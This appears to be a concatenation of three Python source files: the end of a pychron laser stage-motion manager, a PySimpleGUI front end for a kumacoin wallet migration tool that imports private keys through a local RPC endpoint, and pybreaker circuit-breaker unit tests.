sc.add_consumable((sc.update_axes, tuple()))
def moving(self, force_query=False, **kw):
moving = False
if force_query:
moving = self.stage_controller.moving(**kw)
elif self.stage_controller.timer is not None:
moving = self.stage_controller.timer.isActive()
return moving
def get_brightness(self, **kw):
return 0
def get_scores(self, **kw):
return 0, 0
def define_home(self, **kw):
self.stage_controller.define_home(**kw)
def get_z(self):
return self.stage_controller._z_position
def get_uncalibrated_xy(self, pos=None):
if pos is None:
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
canvas = self.canvas
ca = canvas.calibration_item
if ca:
pos = self.stage_map.map_to_uncalibration(pos,
ca.center,
ca.rotation,
ca.scale)
return pos
def get_calibrated_xy(self):
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
pos = self.canvas.map_offset_position(pos)
return self.get_calibrated_position(pos)
def get_calibrated_hole(self, x, y, tol):
ca = self.canvas.calibration_item
if ca is not None:
smap = self.stage_map
xx, yy = smap.map_to_uncalibration((x, y), ca.center, ca.rotation)
return next((hole for hole in smap.sample_holes
if abs(hole.x - xx) < tol and abs(hole.y - yy) < tol), None)
def get_hole_xy(self, key):
hole = self.stage_map.get_hole(key)
self.debug('hole {} for {}'.format(hole, key))
if hole:
if hole.has_correction():
pos = hole.corrected_position
style = 'corrected'
else:
style = 'calibrated'
pos = hole.nominal_position
pos = self.get_calibrated_position(pos)
self.debug('using {} position={}'.format(style, pos))
return pos
# pos = self.stage_map.get_corrected_hole_pos(key)
# pos = self.stage_map.get_hole_pos(key)
# self.debug('hole: {} original x,y = {}'.format(key, pos))
# if pos:
# map the position to calibrated space
# pos = self.get_calibrated_position(pos)
# return pos
def finish_move_to_hole(self, user_entry):
pass
# private
def _update_axes(self):
if self.stage_controller:
self.stage_controller.update_axes()
def _home(self):
"""
"""
if self._homing:
return
self._homing = True
if self.home_option == 'Home All':
msg = 'homing all motors'
homed = ['x', 'y', 'z']
home_kwargs = dict(x=-25, y=-25, z=50)
elif self.home_option == 'XY':
msg = 'homing x,y'
homed = ['x', 'y']
home_kwargs = dict(x=-25, y=-25)
else:
# define_home =
msg = 'homing {}'.format(self.home_option)
home_kwargs = {self.home_option: -25 if self.home_option in ['X', 'Y'] else 50}
homed = [self.home_option.lower().strip()]
self.info(msg)
# if define_home:
self.stage_controller.set_home_position(**home_kwargs)
self.stage_controller.home(homed)
# explicitly block
# self.stage_controller.block()
if 'z' in homed and 'z' in self.stage_controller.axes:
# will be a positive limit error in z
# self.stage_controller.read_error()
time.sleep(1)
self.info('setting z to nominal position. {} mm '.format(self._default_z))
self.stage_controller.single_axis_move('z', self._default_z, block=True)
self.stage_controller._z_position = self._default_z
if self.home_option in ['XY', 'Home All']:
time.sleep(0.25)
# the stage controller should think x and y are at -25,-25
self.stage_controller._x_position = -25
self.stage_controller._y_position = -25
self.info('moving to center')
try:
self.stage_controller.linear_move(0, 0, block=True, sign_correct=False)
except TargetPositionError as e:
self.warning_dialog('Move Failed. {}'.format(e))
self._homing = False
def _get_hole_by_position(self, x, y):
if self.stage_map:
return self.stage_map._get_hole_by_position(x, y)
def _get_hole_by_name(self, key):
sm = self.stage_map
return sm.get_hole(key)
# ===============================================================================
# special move
# ===============================================================================
def _stop(self, ax_key=None, verbose=False):
self.stage_controller.stop(ax_key=ax_key, verbose=verbose)
if self.parent.pattern_executor:
self.parent.pattern_executor.stop()
# def _move(self, func, pos, name=None, *args, **kw):
# if pos is None:
# return
#
# if self.move_thread and self.move_thread.isRunning():
# self.stage_controller.stop()
# if name is None:
# name = func.func_name
#
# self.move_thread = Thread(name='stage.{}'.format(name),
# target=func, args=(pos,) + args, kwargs=kw)
# self.move_thread.start()
def _drill_point(self, pt):
zend = pt.zend
vel = pt.velocity
# assume already at zstart
st = time.time()
self.info('start drilling. move to {}. velocity={}'.format(zend, vel))
self.set_z(zend, velocity=vel, block=True)
et = time.time() - st
self.info('drilling complete. drilled for {}s'.format(et))
def _move_polygon(self, pts, velocity=5,
offset=50,
use_outline=True,
find_min=False,
scan_size=None,
use_move=True,
use_convex_hull=True,
motors=None,
verbose=True,
start_callback=None, end_callback=None):
"""
motors is a dict of motor_name:value pairs
"""
if pts is None:
return
if not isinstance(pts, list):
velocity = pts.velocity
use_convex_hull = pts.use_convex_hull
if scan_size is None:
scan_size = pts.scan_size
use_outline = pts.use_outline
offset = pts.offset
find_min = pts.find_min
pts = [dict(xy=(pi.x, pi.y), z=pi.z, ) for pi in pts.points]
# set motors
if motors is not None:
for k, v in motors.items():
'''
the motor will not be set if it has been locked using set_motor_lock or
remotely using SetMotorLock
'''
if use_move:
self.parent.set_motor(k, v, block=True)
xy = [pi['xy'] for pi in pts]
n = 1000
if scan_size is None:
scan_size = n / 2
# convert points to um
pts = array(xy)
pts *= n
pts = asarray(pts, dtype=int)
'''
sort clockwise ensures consistent offset behavior
a polygon can have an inner or outer sense depending on the order of its vertices;
always use sort_clockwise prior to any polygon manipulation
'''
pts = sort_clockwise(pts, pts)
sc = self.stage_controller
sc.set_program_mode('absolute')
# do smooth transitions between points
sc.set_smooth_transitions(True)
if use_convex_hull:
pts = convex_hull(pts)
if use_outline:
# calculate new polygon
offset_pts = polygon_offset(pts, -offset)
offset_pts = array(offset_pts, dtype=int)
# polygon_offset works with 3D vectors.
# trim to only x,y
pts = offset_pts[:, (0, 1)]
# trace perimeter
if use_move:
p0 = xy[0]
self.linear_move(p0[0], p0[1], mode='absolute', block=True)
sc.timer = sc.timer_factory()
if start_callback is not None:
start_callback()
# buf=[]
for pi in xy[1:]:
self.linear_move(pi[0], pi[1],
velocity=velocity,
mode='absolute', set_stage=False)
# finish at first point
self.linear_move(p0[0], p0[1],
velocity=velocity,
mode='absolute', set_stage=False)
sc.block()
self.info('polygon perimeter trace complete')
'''
there is an opportunity here to turn off the laser and change parameters, e.g. the mask
'''
if use_move:
# calculate and step thru scan lines
self._raster(pts, velocity,
step=scan_size,
scale=n,
find_min=find_min,
start_callback=start_callback, end_callback=end_callback,
verbose=verbose)
sc.set_program_mode('relative')
if end_callback is not None:
end_callback()
self.info('polygon raster complete')
def _raster(self, points, velocity,
step=500,
scale=1000,
find_min=False,
start_callback=None, end_callback=None, verbose=False):
from pychron.core.geometry.scan_line import raster
lines = raster(points, step=step, find_min=find_min)
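# raster() appears to return one (y, x_intersections) entry per scan line, in the same scaled
# integer units as `points`; the values are divided by `scale` below to convert back to stage units.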
# initialize variables
cnt = 0
direction = 1
flip = False
lasing = False
sc = self.stage_controller
if verbose:
self.info('start raster')
# print lines
# loop thru each scan line
# for yi, xs in lines[::skip]:
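# Boustrophedon traversal: `direction` flips after every scan line that produced a move, so
# successive lines are traced in alternating directions; `lasing` tracks whether the laser is
# currently firing, so gaps are crossed with fast blocking moves and segments are traced at `velocity`.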
for yi, xs in lines:
if direction == -1:
xs = list(reversed(xs))
# if there is an odd number of intersections, drop duplicates to make the count even
n = len(xs)
if n % 2 != 0:
xs = sorted(list(set(xs)))
# traverse each x-intersection pair
n = len(xs)
for i in range(0, n, 2):
if len(xs) <= 1:
continue
x1, x2, yy = xs[i] / scale, xs[i + 1] / scale, yi / scale
if abs(x1 - x2) > 1e-10:
if not lasing:
if verbose:
self.info('fast to {} {},{}'.format(cnt, x1, yy))
self.linear_move(x1, yy,
mode='absolute', set_stage=False,
block=True)
if start_callback is not None:
start_callback()
lasing = True
else:
if verbose:
self.info('slow to {} {},{}'.format(cnt, x1, yy))
sc.timer = sc.timer_factory()
self.linear_move(x1, yy,
mode='absolute', set_stage=False,
velocity=velocity)
if verbose:
self.info('move to {}a {},{}'.format(cnt, x2, yy))
# if n > 2 and not i * 2 >= n:
# if this scan line has more than one segment, turn off the laser at the end of this segment
if i + 2 < n and not xs[i + 1] == xs[i + 2]:
self.linear_move(x2, yy, velocity=velocity,
mode='absolute', set_stage=False,
block=True)
self.info('wait for move complete')
if end_callback is not None:
end_callback()
lasing = False
else:
self.linear_move(x2, yy, velocity=velocity,
mode='absolute', set_stage=False,
)
cnt += 1
flip = True
else:
flip = False
if flip:
direction *= -1
sc.block()
if verbose:
self.info('end raster')
def _move_polyline(self, pts, start_callback=None, end_callback=None):
if not isinstance(pts, list):
segs = pts.velocity_segments
segs = segs[:1] + segs
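# velocity_segments presumably has one entry per segment (one fewer than points); duplicating the
# first entry lets the zip below pair every point, including the start point, with a velocity.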
pts = [dict(xy=(pi.x, pi.y), z=pi.z, velocity=vi) for vi, pi in
zip(segs, pts.points)]
sc = self.stage_controller
self.linear_move(pts[0]['xy'][0], pts[0]['xy'][1],
update_hole=False,
use_calibration=False,
block=True)
sc.set_z(pts[0]['z'], block=True)
cpos = dict()
# set motors
for motor in ('mask', 'attenuator'):
if motor in pts[0]:
self.parent.set_motor(motor, pts[0][motor])
cpos[motor] = pts[0][motor]
sc.set_program_mode('absolute')
sc.timer = sc.timer_factory()
if start_callback:
start_callback()
npts = pts[1:]
setmotors = dict()
for i, di in enumerate(npts):
xi, yi, zi, vi = di['xy'][0], di['xy'][1], di['z'], di['velocity']
sc.set_z(zi)
block = False
for motor in ('mask', 'attenuator'):
# if the next step sets a motor to a new value, this move should block so the change can be applied
if i + 1 < len(npts):
dii = npts[i + 1]
if motor in dii and dii[motor] != cpos[motor]:
m = self.parent.get_motor(motor)
if not m.locked:
block = True
setmotors[motor] = dii[motor]
self.linear_move(xi, yi, velocity=vi,
block=block,
mode='absolute', # use absolute mode because commands are queued
set_stage=False)
if block:
if end_callback:
end_callback()
for k, v in setmotors.items():
self.parent.set_motor(k, v, block=True)
if start_callback:
start_callback()
# wait until motion complete
sc.block()
if end_callback:
end_callback()
sc.set_program_mode('relative')
# if start and smooth:
# sc.execute_command_buffer()
# sc.end_command_buffer()
# def start_enqueued(self):
# sc = self.stage_controller
# sc.execute_command_buffer()
# sc.end_command_buffer()
def _move_to_point(self, pt):
self.debug('move to point={}'.format(pt))
if isinstance(pt, str):
pt = self.canvas.get_point(pt)
self.debug('move to point canvas pt={}'.format(pt))
if pt is not None:
pos = pt.x, pt.y
self.info('Move to point {}: {:0.5f},{:0.5f},{:0.5f}'.format(pt.identifier,
pt.x, pt.y, pt.z))
self.stage_controller.linear_move(block=True, *pos)
if hasattr(pt, 'z'):
self.stage_controller.set_z(pt.z, block=True)
self.debug('Not setting motors for pt')
# self.parent.set_motors_for_point(pt)
self._move_to_point_hook()
self.info('Move complete')
self.update_axes()
def _move_to_hole(self, key, correct_position=True, user_entry=False, autocenter_only=False):
self.info('Move to hole {} type={}'.format(key, str(type(key))))
autocentered_position = False
if not autocenter_only:
self.temp_hole = key
self.temp_position = self.stage_map.get_hole_pos(key)
pos = self.stage_map.get_corrected_hole_pos(key)
self.info('position {}'.format(pos))
if pos is not None:
if abs(pos[0]) < 1e-6:
pos = self.stage_map.get_hole_pos(key)
# map the position to calibrated space
pos = self.get_calibrated_position(pos, key=key)
else:
# check if this is an interpolated position
# if so probably want to do an autocentering routine
hole = self.stage_map.get_hole(key)
if hole.interpolated:
self.info('using an interpolated value')
else:
self.info('using previously calculated corrected position')
autocentered_position = True
try:
self.stage_controller.linear_move(block=True, source='move_to_hole {}'.format(pos),
raise_zero_displacement=True, *pos)
except TargetPositionError as e:
self.warning('(001) Move to {} failed'.format(pos))
self.parent.emergency_shutoff(str(e))
return
except ZeroDisplacementException:
correct_position = False
try:
self._move_to_hole_hook(key, correct_position,
autocentered_position)
except TargetPositionError as e:
self.warning('(002) Move failed. {}'.format(e))
self.parent.emergency_shutoff(str(e))
return
self.finish_move_to_hole(user_entry)
self.info('Move complete')
def _move_to_hole_hook(self, *args):
pass
def _move_to_point_hook(self):
pass
# ===============================================================================
# Property Get / Set
# ===============================================================================
def _set_stage_map(self, v):
if v in self.stage_map_names:
for root, ext in ((self.root, '.txt'), (paths.user_points_dir, '.yaml')):
p = os.path.join(root, add_extension(v, ext))
if os.path.isfile(p):
self.info('setting stage map to {}'.format(v))
sm = self.stage_map_klass(file_path=p)
self.canvas.set_map(sm)
self.tray_calibration_manager.load_calibration(stage_map=v)
self.points_programmer.load_stage_map(sm)
return True
else:
self.warning('No stage map named "{}"'.format(v))
return False
def _get_calibrate_stage_label(self):
if self._calibration_state == 'set_center':
r = 'Locate Center'
elif self._calibration_state == 'set_right':
r = 'Locate Right'
else:
r = 'Calibrate Stage'
return r
def _get_program_points_label(self):
return 'Program Points' if not self.canvas.markup else 'End Program'
def _validate_hole(self, v):
nv = None
try:
if v.strip():
nv = int(v)
except (TypeError, ValueError):
self.warning('invalid hole {}'.format(v))
return nv
# def _get_calibrated_position_entry(self):
# return self._calibrated_position
#
# def _set_calibrated_position_entry(self, v):
# self._calibrated_position = v
# if XY_REGEX.match(v):
# self._move_to_calibrated_position(v)
# else:
# self.move_to_hole(v)
def _move_to_calibrated_position(self, pos):
try:
args = csv_to_floats(pos)
except ValueError:
self.warning('invalid calibrated position "{}". Could not convert to floats'.format(pos))
return
if len(args) == 2:
x, y = args
self.linear_move(x, y, use_calibration=True, block=False)
else:
self.warning('invalid calibrated position. incorrect number of arguments "{}"'.format(args))
def _set_point(self, v):
if self.canvas.calibrate:
self.warning_dialog('Cannot move while calibrating')
return
if self.canvas.markup:
self.warning_dialog('Cannot move while adding/editing points')
return
if (self.move_thread is None or not self.move_thread.isRunning()) and v is not self._point:
pos = self.canvas.get_item('point', int(v) - 1)
if pos is not None:
self._point = v
self.move_thread = Thread(target=self._move_to_point, args=(pos,))
self.move_thread.start()
else:
err = 'Invalid point {}'.format(v)
self.warning(err)
return err
def _get_point(self):
return self._point
# ===============================================================================
# handlers
# ===============================================================================
def _manual_override_position_button_fired(self):
sm = self.stage_map
pos = self.calibrated_position_entry
hole = self.stage_map.get_hole(pos)
if hole is not None:
x, y = self.stage_controller.x, self.stage_controller.y
sm.set_hole_correction(pos, x, y)
sm.dump_correction_file()
self.info('updated {} correction file. Saved {}: {},{}'.format(sm.name, pos, x, y))
def _stop_button_fired(self):
self._stop()
def _ejoystick_fired(self):
self.joystick = not self.joystick
if self.joystick:
self.stage_controller.enable_joystick()
self.joystick_label = 'Disable Joystick'
self.joystick_timer = self.timer_factory(func=self._joystick_inprogress_update)
else:
if self.joystick_timer is not None:
self.joystick_timer.Stop()
self.stage_controller.disable_joystick()
self.joystick_label = 'Enable Joystick'
def _home_fired(self):
"""
"""
t = Thread(name='stage.home', target=self._home)
t.start()
# need to store a reference to thread so it is not garbage collected
self.move_thread = t
# do_later(self._home)
def _test_fired(self):
# self.do_pattern('testpattern')
self.do_pattern('pattern003')
# ===============================================================================
# factories
# ===============================================================================
def _motion_configure_factory(self, **kw):
return MotionControllerManager(motion_controller=self.stage_controller,
application=self.application,
**kw)
def _stage_controller_factory(self):
if self.stage_controller_klass == 'Newport':
from pychron.hardware.newport.newport_motion_controller import NewportMotionController
factory = NewportMotionController
elif self.stage_controller_klass == 'Aerotech':
from pychron.hardware.aerotech.aerotech_motion_controller import AerotechMotionController
factory = AerotechMotionController
m = factory(name='{}controller'.format(self.name),
configuration_name='stage_controller',
configuration_dir_name=self.configuration_dir_name,
parent=self)
return m
def _canvas_factory(self):
"""
"""
w = 640 / 2.0 / 23.2
h = 0.75 * w
l = LaserTrayCanvas(stage_manager=self,
padding=[30, 5, 5, 30],
map=self.stage_map,
view_x_range=[-w, w],
view_y_range=[-h, h])
return l
# ===============================================================================
# defaults
# ===============================================================================
def _motion_controller_manager_default(self):
return self._motion_configure_factory()
def _title_default(self):
return '%s Stage Manager' % self.name[:-5].capitalize()
def _points_programmer_default(self):
pp = PointsProgrammer(canvas=self.canvas,
stage_map_klass=self.stage_map_klass,
stage_manager=self)
pp.on_trait_change(self.move_to_point, 'point')
pp.on_trait_change(self.move_polygon, 'polygon')
pp.on_trait_change(self.move_polyline, 'line')
return pp
# ===============================================================================
# mass spec hacks
# ===============================================================================
# _temp_position = None
# def _get_temp_position(self):
# return self._temp_position
#
# def _set_temp_position(self, v):
# self._temp_position = v
#
# temp_position = property(fget=_get_temp_position,
# fset=_set_temp_position)
if __name__ == '__main__':
from pychron.core.helpers.logger_setup import logging_setup
logging_setup('stage_manager')
name = 'diode'
s = StageManager(
name='{}stage'.format(name),
configuration_dir_name=name,
# parent = DummyParent(),
window_width=945,
window_height=545
)
# from pychron.initializer import Initializer
#
# i = Initializer()
# i.add_initialization(dict(name = 'stage_manager',
# manager = s
# ))
# i.run()
# s.update_axes()
s.load()
s.stage_controller.bootstrap()
s.configure_traits()
# ========================EOF============================
# view groups
# ===============================================================================
# def _hole__group__(self):
# g = Group(HGroup(Item('hole'), spring))
# return g
# def _position__group__(self):
# g = Group(HGroup(Item('calibrated_position_entry', label='Position',
# tooltip='Enter a x,y point in reference frame space',
# ), spring))
# g = Group(
# Item('calibrated_position_entry',
# show_label=False,
# tooltip='Enter a position e.g. 1 for a hole, or 3,4 for X,Y'
# ), label='Calibrated Position',
# show_border=True)
# return g
# def _button__group__(self):
# '''
# '''
# vg = VGroup()
#
# home = self._button_factory(*self.buttons[0])
# calibrate_stage = self._button_factory(*self.buttons[1])
#
# vg.content.append(HGroup(calibrate_stage, home,
# Item('home_option',
# editor=EnumEditor(values=self.home_options),
# show_label=False)))
#
# if len(self.buttons) > 2:
# # vg.content.append(self._button_group_factory(self.buttons[:2], orientation = 'h'))
# vg.content.append(self._button_group_factory(self.buttons[2:], orientation='h'))
# return vg
# def _axis__group__(self):
# '''
# '''
# return Item('stage_controller', show_label=False, style='custom')
#
#
# def _sconfig__group__(self):
# '''
# '''
# return Group(
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# Group(
# Item('canvas', show_label=False,
# editor=InstanceEditor(view='config_view'),
# style='custom'
# ),
# label='Canvas'),
#
# # Group(Item('motion_controller_manager', editor=InstanceEditor(view='configure_view'),
# # style='custom', show_label=False),
# # Item('motion_profiler', style='custom', show_label=False),
# # label='Motion'
# # ),
#
# # Group(
# # self._button_factory('program_points', 'program_points_label'),
# # Item('accept_point', show_label=False),
# # Item('load_points', show_label=False),
# # Item('save_points', show_label=False),
# # Item('clear_points', show_label=False),
# # label='Points'),
# Item('points_programmer',
# label='Points',
# show_label=False, style='custom'),
# Item('tray_calibration_manager',
# label='Calibration',
# show_label=False, style='custom'),
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# # Item('output', show_label = False, style = 'custom'),
#
# # Item('jog_manager', show_label = False, style = 'custom',
# # resizable=False
# # ),
# layout='tabbed'
# )
|
gui.py
|
from kuma1to2 import *
import PySimpleGUI as sg
import threading
import os
def main():
system_msg = sg.Multiline(
"msg: please fill in the blanks\n",
text_color="gray", size=(60, 10), autoscroll=True)
password_input = sg.Input("", disabled=True)
ok_button = sg.OK()
layout = [
[sg.Text("warning: Do not forget backup original wallet!", text_color="red")],
[
sg.Text("you need set password below if encrypt wallet"),
sg.Checkbox("encrypted", enable_events=True, default=False),
],
[password_input],
[sg.Text("wallet.dat"), sg.Input(), sg.FileBrowse()],
[
sg.Text("endpoint"),
sg.Input("http", size=(10, None)),
sg.Text("://"),
sg.Input("127.0.0.1", size=(10, None)),
sg.Text(":"),
sg.Input("3000", size=(6, None))
],
[
sg.Text("authentication"),
sg.Input("user", size=(20, None)),
sg.Text(":"),
sg.Input("password", size=(20, None)),
],
[
sg.Text("human readable part(hrp)"),
sg.Input("test", size=(20, None)),
],
[sg.Text("system message")],
[system_msg],
[ok_button, sg.CloseButton("close")],
]
window = sg.Window("kumacoin 1.0⇒2.0 swapper (%s)" % __version__,
layout, debugger_enabled=False)
window.read_call_from_debugger = True
while True:
try:
event, values = window.read()
if event in (None, 'close'):
# if the user closes the window or clicks close
break
if event == 0:
# checkbox
password_input.update(disabled=not values[event])
continue
if event != "OK":
system_msg.update("warning unknown event `%s`\n" % event, append=True)
continue
# setup params
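# The integer indices below rely on PySimpleGUI's auto-assigned keys (elements without an explicit
# key are numbered in layout order): 0=encrypt checkbox, 1=password, 2=wallet.dat path,
# 3/4/5=endpoint scheme/host/port, 6/7=RPC user/password, 8=hrp.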
password = values[1] if values[0] else ""
system_msg.update("msg: password=`%s`\n" % password, append=True)
wallet_path = values[2]
system_msg.update("msg: wallet=`%s`\n" % wallet_path, append=True)
url = "%s://%s:%s@%s:%s/private/importprivatekey" \
% (values[3], values[6], values[7], values[4], values[5])
system_msg.update("msg: url=`%s`\n" % url, append=True)
hrp = values[8]
system_msg.update("msg: hrp=`%s`\n" % hrp, append=True)
# check
if not os.path.exists(wallet_path):
system_msg.update("error: wallet.dat not found\n", append=True)
continue
if not os.path.isfile(wallet_path):
system_msg.update("error: path is not a file\n", append=True)
continue
# search
threading.Thread(
target=task, args=(password, wallet_path, hrp, url, system_msg, ok_button)).start()
except Exception as e:
system_msg.update("error: `%s`\n" % str(e), append=True)
if __name__ == '__main__':
main()
|
tests.py
|
#-*- coding:utf-8 -*-
import unittest
from datetime import datetime
from time import sleep
import mock
from pytest import fail
from tornado import gen
from tornado import testing
from pybreaker import *
class CircuitBreakerStorageBasedTestCase(object):
"""
Mix in to test against different storage backings. Depends on
`self.breaker` and `self.breaker_kwargs`.
"""
def test_successful_call(self):
"""CircuitBreaker: it should keep the circuit closed after a successful
call.
"""
def func(): return True
self.assertTrue(self.breaker.call(func))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_one_failed_call(self):
"""CircuitBreaker: it should keep the circuit closed after a few
failures.
"""
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertEqual(1, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_one_successful_call_after_failed_call(self):
"""CircuitBreaker: it should keep the circuit closed after few mixed
outcomes.
"""
def suc(): return True
def err(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertEqual(1, self.breaker.fail_counter)
self.assertTrue(self.breaker.call(suc))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_several_failed_calls(self):
"""CircuitBreaker: it should open the circuit after many failures.
"""
self.breaker = CircuitBreaker(fail_max=3, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(3, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_traceback_in_circuitbreaker_error(self):
"""CircuitBreaker: it should open the circuit after many failures.
"""
self.breaker = CircuitBreaker(fail_max=3, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
# Circuit should open
try:
self.breaker.call(func)
fail('CircuitBreakerError should throw')
except CircuitBreakerError as e:
import traceback
self.assertIn('NotImplementedError', traceback.format_exc())
self.assertEqual(3, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_failed_call_after_timeout(self):
"""CircuitBreaker: it should half-open the circuit after timeout.
"""
self.breaker = CircuitBreaker(fail_max=3, reset_timeout=0.5, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertEqual('closed', self.breaker.current_state)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(3, self.breaker.fail_counter)
# Wait for timeout
sleep(0.6)
# Circuit should open again
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(4, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_successful_after_timeout(self):
"""CircuitBreaker: it should close the circuit when a call succeeds
after timeout. The successful function should only be called once.
"""
self.breaker = CircuitBreaker(fail_max=3, reset_timeout=1, **self.breaker_kwargs)
suc = mock.MagicMock(return_value=True)
def err(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertEqual('closed', self.breaker.current_state)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, err)
self.assertRaises(CircuitBreakerError, self.breaker.call, suc)
self.assertEqual(3, self.breaker.fail_counter)
# Wait for timeout, at least a second since redis rounds to a second
sleep(2)
# Circuit should close again
self.assertTrue(self.breaker.call(suc))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
self.assertEqual(1, suc.call_count)
def test_failed_call_when_halfopen(self):
"""CircuitBreaker: it should open the circuit when a call fails in
half-open state.
"""
def fun(): raise NotImplementedError()
self.breaker.half_open()
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('half-open', self.breaker.current_state)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, fun)
self.assertEqual(1, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
def test_successful_call_when_halfopen(self):
"""CircuitBreaker: it should close the circuit when a call succeeds in
half-open state.
"""
def fun(): return True
self.breaker.half_open()
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('half-open', self.breaker.current_state)
# Circuit should close
self.assertTrue(self.breaker.call(fun))
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_close(self):
"""CircuitBreaker: it should allow the circuit to be closed manually.
"""
self.breaker = CircuitBreaker(fail_max=3, **self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertRaises(NotImplementedError, self.breaker.call, func)
# Circuit should open
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertRaises(CircuitBreakerError, self.breaker.call, func)
self.assertEqual(3, self.breaker.fail_counter)
self.assertEqual('open', self.breaker.current_state)
# Circuit should close again
self.breaker.close()
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual('closed', self.breaker.current_state)
def test_transition_events(self):
"""CircuitBreaker: it should call the appropriate functions on every
state transition.
"""
class Listener(CircuitBreakerListener):
def __init__(self):
self.out = ''
def state_change(self, cb, old_state, new_state):
assert cb
if old_state: self.out += old_state.name
if new_state: self.out += '->' + new_state.name
self.out += ','
listener = Listener()
self.breaker = CircuitBreaker(listeners=(listener,), **self.breaker_kwargs)
self.assertEqual('closed', self.breaker.current_state)
self.breaker.open()
self.assertEqual('open', self.breaker.current_state)
self.breaker.half_open()
self.assertEqual('half-open', self.breaker.current_state)
self.breaker.close()
self.assertEqual('closed', self.breaker.current_state)
self.assertEqual('closed->open,open->half-open,half-open->closed,', \
listener.out)
def test_call_events(self):
"""CircuitBreaker: it should call the appropriate functions on every
successful/failed call.
"""
self.out = ''
def suc(): return True
def err(): raise NotImplementedError()
class Listener(CircuitBreakerListener):
def __init__(self):
self.out = ''
def before_call(self, cb, func, *args, **kwargs):
assert cb
self.out += '-'
def success(self, cb):
assert cb
self.out += 'success'
def failure(self, cb, exc):
assert cb; assert exc
self.out += 'failure'
listener = Listener()
self.breaker = CircuitBreaker(listeners=(listener,), **self.breaker_kwargs)
self.assertTrue(self.breaker.call(suc))
self.assertRaises(NotImplementedError, self.breaker.call, err)
self.assertEqual('-success-failure', listener.out)
def test_generator(self):
"""CircuitBreaker: it should inspect generator values.
"""
@self.breaker
def suc(value):
"Docstring"
yield value
@self.breaker
def err(value):
"Docstring"
x = yield value
raise NotImplementedError(x)
s = suc(True)
e = err(True)
next(e)
self.assertRaises(NotImplementedError, e.send, True)
self.assertEqual(1, self.breaker.fail_counter)
self.assertTrue(next(s))
self.assertRaises((StopIteration, RuntimeError), lambda: next(s))
self.assertEqual(0, self.breaker.fail_counter)
class CircuitBreakerConfigurationTestCase(object):
"""
Tests for the CircuitBreaker class.
"""
def test_default_state(self):
"""CircuitBreaker: it should get initial state from state_storage.
"""
for state in (STATE_OPEN, STATE_CLOSED, STATE_HALF_OPEN):
storage = CircuitMemoryStorage(state)
breaker = CircuitBreaker(state_storage=storage)
self.assertEqual(breaker.state.name, state)
def test_default_params(self):
"""CircuitBreaker: it should define smart defaults.
"""
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(60, self.breaker.reset_timeout)
self.assertEqual(5, self.breaker.fail_max)
self.assertEqual('closed', self.breaker.current_state)
self.assertEqual((), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_new_with_custom_reset_timeout(self):
"""CircuitBreaker: it should support a custom reset timeout value.
"""
self.breaker = CircuitBreaker(reset_timeout=30)
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(30, self.breaker.reset_timeout)
self.assertEqual(5, self.breaker.fail_max)
self.assertEqual((), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_new_with_custom_fail_max(self):
"""CircuitBreaker: it should support a custom maximum number of
failures.
"""
self.breaker = CircuitBreaker(fail_max=10)
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(60, self.breaker.reset_timeout)
self.assertEqual(10, self.breaker.fail_max)
self.assertEqual((), self.breaker.excluded_exceptions)
self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_new_with_custom_excluded_exceptions(self):
"""CircuitBreaker: it should support a custom list of excluded
exceptions.
"""
self.breaker = CircuitBreaker(exclude=[Exception])
self.assertEqual(0, self.breaker.fail_counter)
self.assertEqual(60, self.breaker.reset_timeout)
self.assertEqual(5, self.breaker.fail_max)
self.assertEqual((Exception,), self.breaker.excluded_exceptions)
